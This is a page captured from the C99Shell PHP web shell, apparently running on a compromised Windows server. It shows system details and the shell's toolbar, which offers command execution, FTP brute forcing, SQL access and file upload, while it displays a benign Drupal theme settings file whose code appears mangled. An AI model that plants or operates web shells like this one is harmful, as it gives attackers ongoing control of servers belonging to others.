!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\htdocs\drupal\themes\zen\zen_classic\   drwxrwxrwx
Free 7.95 GB of 239.26 GB (3.32%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     theme-settings.php (1.26 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
// $Id: theme-settings.php,v 1.8 2008/05/13 09:19:13 johnalbin Exp $

/**
 * Implementation of THEMEHOOK_settings() function.
 *
 * @param $saved_settings
 *   An array of saved settings for this theme.
 * @return
 *   A form array.
 */
function zen_classic_settings($saved_settings) {

  
// Get the default values from the .info file.
  
$themes list_themes();
  
$defaults $themes['zen_classic']->info['settings'];

  
// Merge the saved variables and their default values.
  
$settings array_merge($defaults$saved_settings);

  
/*
   * Create the form using Forms API: http://api.drupal.org/api/6
   */
  
$form = array();
  
$form['zen_classic_fixed'] = array(
    
'#type'          => 'checkbox',
    
'#title'         => t('Use fixed width for theme'),
    
'#default_value' => $settings['zen_classic_fixed'],
    
'#description'   => t('The theme should be centered and fixed at 960 pixels wide.'),
  );

  
// Add the base theme's settings.
  
include_once './' drupal_get_path('theme''zen') . '/theme-settings.php';
  
$form += zen_settings($saved_settings$defaults);

  
// Remove some of the base theme's settings.
  
unset($form['themedev']);
  
//unset($form['themedev']['zen_layout']); // We don't need to select the base stylesheet.

  // Return the form
  
return $form;
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--